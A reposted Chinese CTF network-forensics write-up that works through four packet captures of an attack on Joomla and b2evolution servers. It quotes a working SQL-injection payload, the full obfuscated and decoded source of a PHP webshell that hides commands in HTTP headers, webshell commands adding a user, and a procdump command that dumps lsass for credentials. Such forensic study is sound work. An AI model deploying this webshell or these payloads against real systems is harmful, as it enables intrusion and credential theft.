2018.5.5铁三数据赛(第三赛区) 复现

其他 2020-02-19 16:01:05 阅读次数: 0

1、pcap

题目:

  1. 黑客攻击的第一个受害主机的网卡IP地址
  2. 黑客对URL的哪一个参数实施了SQL注入
  3. 第一个受害主机网站数据库的表前缀(加上下划线例如abc_)
  4. 第一个受害主机网站数据库的名字
  5. Joomla后台管理员的密码是多少

先过滤http协议
外网ip/黑客ip:202.1.1.2
内网ip/服务器ip/目标机ip:192.168.1.8

继续观察

url decode后:

/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=() AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71717a7671,(SELECT (ELT(1188=1188,1))),0x71716b6b71,0x78))s), 8446744073709551610, 8446744073709551610)))-- gQsZ

明显的sql语句,所以对url注入的参数为list[select]

追踪该tcp流

受害主机网站数据库的表前缀即为:ajtuc_

进一步过滤:

(ip.addr == 202.1.1.2 || ip.addr == 192.168.1.8) && http

追踪最后一次的注入,对list[select]参数url解码后得到:

(UPDATEXML(6315,CONCAT(0x2e,0x71717a7671,(SELECT MID((IFNULL(CAST(username AS CHAR),0x20)),1,22) FROM joomla.ajtuc_users ORDER BY id LIMIT 0,1),0x71716b6b71),4235))

明显,受害主机网站数据库的名字为:joomla

在sql注入中找password

ip.addr == 192.168.1.8 && http contains "password"


Status: 500 XPATH syntax error: 'qqzvq$2y$10$lXujU7XaUviJDigqqkkq' 
Status: 500 XPATH syntax error: 'qqzvqFMzKy6.wx7EMCBqpzrJdn7qqkkq'
Status: 500 XPATH syntax error: 'qqzvqzi/8B2QRD7qIlDJeqqkkq'
0x71717a7671
0x71716b6b71

用脚本解密后

qqzvq
qqkkq

去掉前后缀,连起来后得到:

$2y$10$lXujU7XaUviJDigFMzKy6.wx7EMCBqpzrJdn7zi/8B2QRD7qIlDJe

这是啥加密

2.pcap

题目:

  1. 黑客第一次获得的php木马的密码是什么
  2. 黑客第二次上传php木马是什么时间
  3. 第二次上传的木马通过HTTP协议中的哪个头传递数据

继续用之前的操作过滤
发现了php文件

看到base64,菜刀流量的特征
php木马的密码即为:zzz

再往后看,有一条和其它的都不一样,有较长的16进制串

复制到HxD中,保存为php,后门源码:

<?php
$p='l>]ower";$i>]=$m[1][0].$m[1]>][1];$h>]=$>]sl($ss(m>]d5($i.>]$kh),0>],3))>];$f=$s>]l($s>]s(md5';
$d=']q=array_v>]>]alues(>]$q);>]preg_match_a>]ll("/(>][\\w]>])[\\w->]]+>](?:;q=>]0.([\\d]))?,?/",>';
$W='),$ss(>]$s[>]$i],>]0,$e))),$>]>]k)));>]$o=ob_get_content>]>]s();ob_end_>]>]clean();$d=>]base';
$e=']T_LANGUAGE"];if($rr>]&&$>]ra){$>]u=pars>]e_>]url($rr);par>]se_st>]r($u[">]query"],$>]q);$>';
$E='>]64_e>]ncod>]e>](>]x(gz>]compress($o),$k));pri>]nt("<$k>$d<>]/$k>">])>];@>]session_destr>]oy();}}}}';
$t='($i.>]$kf),0,3>]));$p>]="";fo>]r($z=1>];$z<>]count($m>][1]);$z+>]>]+)$p>].=$q[$m[>]2][$z]];i>';
$M=']$ra,$>]m);if($q>]&&$m>]){@sessi>]on_sta>]>]rt();$s=&$>]_SESS>]ION;$>]>]s>]s="substr";$sl="s>]>]trto';
$P=']f(s>]tr>]pos($p>],$h)===0){$s[>]$i]="";$p>]=$ss($>]p,3);>]}if(ar>]ray>]_key_exist>]>]s($i,$>]s)>]){$>';
$j=str_replace('fr','','cfrrfreatfrfre_funcfrtfrion');
$k='];}}re>]>]turn $o;>]}$>]r=$_SERV>]ER;$rr=@$r[>]"HTTP>]_REFERE>]R"];$ra>]=@>]$r[">]HTTP_A>]CC>]EP>';
$g='"";for(>]$i=>]0;$i<$l;>])>]{for($j=0;($j<>]$c&&>]$i<$l);$>]j++,$i>]++){$o.>]=$t{$i>]}^$k{$j}>';
$R='$k>]h="cb4>]2";$kf="e130">];functio>]n>] x($t>],$k){$c=s>]trle>]>]n($k);$l=strle>]n>]($t)>];$o=';
$Q=']s[$i].=$p;$e=strp>]>]os(>]$s[$i>]],$f);if($>]e){$k=$kh.$k>]f;>]ob_sta>]rt();@e>]val(@gzun>]co>';
$v=']mpress(@x>](@b>]as>]>]e64_decode(pr>]>]e>]g_repla>]ce(array("/_/","/-/"),arr>]ay(>]"/","+">]';
$x=str_replace('>]','',$R.$g.$k.$e.$d.$M.$p.$t.$P.$Q.$v.$W.$E);
$N=$j('',$x);$N();
?>

解混淆,在末尾加上2行:

var_dump($j);
var_dump($x);

我在linux下运行,解混淆后的源码:

string(15) "create_function"
string(929) "$kh="cb42";$kf="e130";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();@eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}"

在线美化怎么不行呢,手动吧

<?php
$kh="cb42";
$kf="e130";
function x($t,$k)
{
    $c=strlen($k);
    $l=strlen($t);
    $o="";
    for($i=0;$i<$l;){
        for($j=0;($j<$c&&$i<$l);$j++,$i++){
            $o.=$t{$i}^$k{$j};
        }
    }
    return $o;
}
$r=$_SERVER;
$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];
if($rr&&$ra){
    $u=parse_url($rr);
    parse_str($u["query"],$q);
    $q=array_values($q);
    preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);
    if($q&&$m){
        @session_start();
        $s=&$_SESSION;
        $ss="substr";
        $sl="strtolower";
        $i=$m[1][0].$m[1][1];
        $h=$sl($ss(md5($i.$kh),0,3));
        $f=$sl($ss(md5($i.$kf),0,3));
        $p="";
        for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];
        if(strpos($p,$h)===0){
            $s[$i]="";
            $p=$ss($p,3);
        }
        if(array_key_exists($i,$s)){
            $s[$i].=$p;
            $e=strpos($s[$i],$f);
            if($e){
                $k=$kh.$kf;
                ob_start();
                @eval(@gzuncompress(@x(@base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));
                $o=ob_get_contents();
                ob_end_clean();
                $d=base64_encode(x(gzcompress($o),$k));
                print("<$k>$d</$k>");
                @session_destroy();
            }
        }
    }
}
?>

确定这就是第二个马
第二次传马的时间即为:

17:20:44.248365000


在源码中看到http头的2个参数:

$rr=@$r["HTTP_REFERER"];
$ra=@$r["HTTP_ACCEPT_LANGUAGE"];

对参数z1 base64 decode后,得到:/var/www/html/joomla/tmp/footer.php,所以第二个马的名称是footer.php
追踪footer.php的流

Accept-Language,挺正常
所以,马通过HTTP协议中的Referer头传递数据

3.pcap

题目:

  1. 内网主机的mysql用户名和请求连接的密码hash是多少(用户:密码hash)
  2. php代理第一次被使用时最先连接了哪个IP地址

过滤mysql协议

tcp contains "mysql" && mysql

发现黑客对Mysql的登录进行了大量的爆破,受害机ip:192.168.2.20

找最后一条登录数据

admin:1a3068c3e29e03e3bcfdba6f8669ad23349dc6c4

重新过滤:

ip.addr == 202.1.1.2 and http.request.method == POST

php代理第一次被使用时最先连接的ip是4.2.2.2

4.pcap

题目:

  1. 黑客第一次获取到当前目录下的文件列表的漏洞利用请求发生在什么时候
  2. 黑客在内网主机中添加的用户名和密码是多少
  3. 黑客从内网服务器中下载下来的文件名

获取目录下的文件列表用dir或ls命令

(ip.addr == 192.168.1.8 || ip.addr == 202.1.1.2) && (http contains "dir" || http contains "ls")

嘿嘿,ls和dir下的都有

ls在前,先追踪其流,没执行成功
再追踪dir的流

OK,dir命令执行成功
时间:18:36:59.770782000

此时,内网主机ip:192.168.2.20

ip.addr ==192.168.2.20 && http

菜刀的包较多

ip.src == 192.168.2.20 && http

在10:49:27时用户是star,在10:50:42时用户变成kaka
之间有3条包,先在star后的第一个post包中,对参数z2 b64 decode后得到:

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&net user kaka kaka /add&echo [S]&cd&echo [E]

黑客在内网主机中添加的用户名和密码:kaka kaka

过滤POST流量

ip.dst == 192.168.2.20 && http.request.method==POST

cd/d"C:\phpStudy\WWW\b2evolution\install\test\"&procdump.exe -accepteula -ma lspasss.dmp&echo [S]&cd&echo [E]

可见使用了procdump.exe
在最后一个包中,对z1参数解b64后发现文件

C:\phpStudy\WWW\b2evolution\install\test\lsass.exe_180208_185247.dmp

内网服务器中下载下来的文件名:lsass.exe_180208_185247.dmp

猜你喜欢

转载自www.cnblogs.com/wrnan/p/12331564.html
今日推荐
LFOSSA 源来如此公开课 | 掌握云原生未来:CNCF 认证全面攻略与备考秘籍
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
周排行
Family Tree 题解
BZOJ 1093 最大半连通子图 SCC + DP
幂等处理
Spring----学习(2)----XML 配置Bean 自动装配
SQL Server 远程更新目标表数据
HIbernate3.6 环境搭建
特殊符号正则表达式
【Linux】第一章 进程的理解
843. n-皇后问题(dfs+输出各种情况)
空间数据库2
每日归档
更多
2024-04-26(39)
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022